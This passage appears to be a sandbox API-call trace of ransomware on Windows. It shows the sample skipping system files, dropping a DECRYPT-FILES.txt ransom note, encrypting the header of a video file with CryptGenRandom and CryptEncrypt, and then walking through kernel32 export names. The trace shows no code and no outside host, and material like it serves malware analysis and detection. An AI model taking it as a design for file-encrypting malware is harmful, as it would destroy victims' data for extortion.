(lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0087.228] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpSrch="\\All Users") returned 0x0 [0087.228] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpSrch="\\IETldCache\\") returned 0x0 [0087.228] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpSrch="\\Local Settings\\") returned 0x0 [0087.228] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpSrch="\\AppData\\Local") returned 0x0 [0087.228] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpSrch="AhnLab") returned 0x0 [0087.228] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0087.228] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0087.228] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.228] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\\\jkbimi8.tmp") returned 66 [0087.228] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x410 [0087.228] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0087.228] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0087.228] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\\\DECRYPT-FILES.txt") returned 72 [0087.228] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0087.229] WriteFile (in: hFile=0x414, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e6b0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e6b0*=0x23fc, lpOverlapped=0x0) returned 1 [0087.230] CloseHandle (hObject=0x414) returned 1 [0087.230] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0087.230] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\*" [0087.230] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\*", lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8dc74a80, ftCreationTime.dwHighDateTime=0x1d4c864, ftLastAccessTime.dwLowDateTime=0xb02f7200, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb02f7200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c98 [0087.230] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.230] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8dc74a80, ftCreationTime.dwHighDateTime=0x1d4c864, ftLastAccessTime.dwLowDateTime=0xb02f7200, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb02f7200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.230] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.230] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.230] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3205a20, ftCreationTime.dwHighDateTime=0x1d4c554, ftLastAccessTime.dwLowDateTime=0x34740ea0, ftLastAccessTime.dwHighDateTime=0x1d4c5e9, ftLastWriteTime.dwLowDateTime=0x34740ea0, ftLastWriteTime.dwHighDateTime=0x1d4c5e9, nFileSizeHigh=0x0, nFileSizeLow=0xd118, dwReserved0=0x0, dwReserved1=0x0, cFileName="0xbWCInM_ATbmV-Z.mp4", cAlternateFileName="0XBWCI~1.MP4")) returned 1 [0087.230] lstrcmpiW (lpString1="0xbWCInM_ATbmV-Z.mp4", lpString2="DECRYPT-FILES.txt") returned -1 [0087.230] lstrcmpiW (lpString1="0xbWCInM_ATbmV-Z.mp4", lpString2="autorun.inf") returned -1 [0087.230] lstrcmpiW (lpString1="0xbWCInM_ATbmV-Z.mp4", lpString2="boot.ini") returned -1 [0087.230] lstrcmpiW (lpString1="0xbWCInM_ATbmV-Z.mp4", lpString2="desktop.ini") returned -1 [0087.230] lstrcmpiW (lpString1="0xbWCInM_ATbmV-Z.mp4", lpString2="ntuser.dat") returned -1 [0087.230] lstrcmpiW (lpString1="0xbWCInM_ATbmV-Z.mp4", lpString2="iconcache.db") returned -1 [0087.230] lstrcmpiW (lpString1="0xbWCInM_ATbmV-Z.mp4", lpString2="bootsect.bak") returned -1 [0087.230] lstrcmpiW (lpString1="0xbWCInM_ATbmV-Z.mp4", lpString2="ntuser.dat.log") returned -1 [0087.230] lstrcmpiW (lpString1="0xbWCInM_ATbmV-Z.mp4", lpString2="thumbs.db") returned -1 [0087.230] lstrcmpiW (lpString1="0xbWCInM_ATbmV-Z.mp4", lpString2="Bootfont.bin") returned -1 [0087.230] lstrlenW (lpString="0xbWCInM_ATbmV-Z.mp4") returned 20 [0087.231] lstrcmpiW (lpString1="mp4", lpString2="lnk") returned 1 [0087.231] lstrcmpiW (lpString1="mp4", lpString2="exe") returned 1 [0087.231] lstrcmpiW (lpString1="mp4", lpString2="sys") returned -1 [0087.231] lstrcmpiW (lpString1="mp4", lpString2="dll") returned 1 [0087.231] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0087.231] lstrlenW (lpString="0xbWCInM_ATbmV-Z.mp4") returned 20 [0087.231] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0087.231] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="0xbWCInM_ATbmV-Z.mp4" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\0xbWCInM_ATbmV-Z.mp4") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\0xbWCInM_ATbmV-Z.mp4" [0087.231] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.231] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\0xbWCInM_ATbmV-Z.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\0xbwcinm_atbmv-z.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0087.231] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=53528) returned 1 [0087.231] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0087.231] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.239] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.239] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.239] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.239] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0087.239] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.240] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.241] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.241] CloseHandle (hObject=0x42c) returned 1 [0087.241] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.242] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0087.242] CloseHandle (hObject=0x0) returned 0 [0087.242] CloseHandle (hObject=0x428) returned 1 [0087.243] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.243] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.243] GetTickCount () returned 0x114e418 [0087.243] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.243] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.243] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.244] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.244] lstrlenA (lpString="kernel32.dll") returned 12 [0087.244] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.244] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.244] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.244] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.244] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.244] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.244] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.244] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.244] lstrlenA (lpString="ADDATOMA") returned 8 [0087.244] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.244] lstrlenA (lpString="ADDATOMW") returned 8 [0087.244] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.244] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.244] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.244] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.244] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.244] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.244] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.245] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.245] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.245] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.245] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.245] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.245] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.245] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.245] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.245] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.245] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.245] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.245] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.245] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.245] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.245] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.245] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.245] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.245] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.245] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.245] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.245] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.245] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.245] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.245] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.245] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.245] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.245] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.245] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.245] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.245] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.245] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.245] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.245] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.245] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.245] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.245] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.245] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.246] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.246] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.246] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.246] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.246] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.246] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.246] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.246] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.246] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.246] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.246] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.246] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.246] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.246] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.246] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.246] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.246] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.246] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.247] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.247] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.247] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.247] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.247] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.247] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.247] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.247] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.247] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.247] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.247] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.247] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.247] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.247] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.247] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.247] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.247] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.247] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.247] lstrlenA (lpString="BEEP") returned 4 [0087.247] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.247] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.247] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.247] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.247] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.247] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.247] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.247] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.247] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.247] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.247] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.247] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.247] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.247] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.247] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.247] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.248] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.248] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.248] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.248] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.248] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.248] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.248] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.248] lstrlenA (lpString="CANCELIO") returned 8 [0087.248] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.248] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.248] lstrcpyA (in: 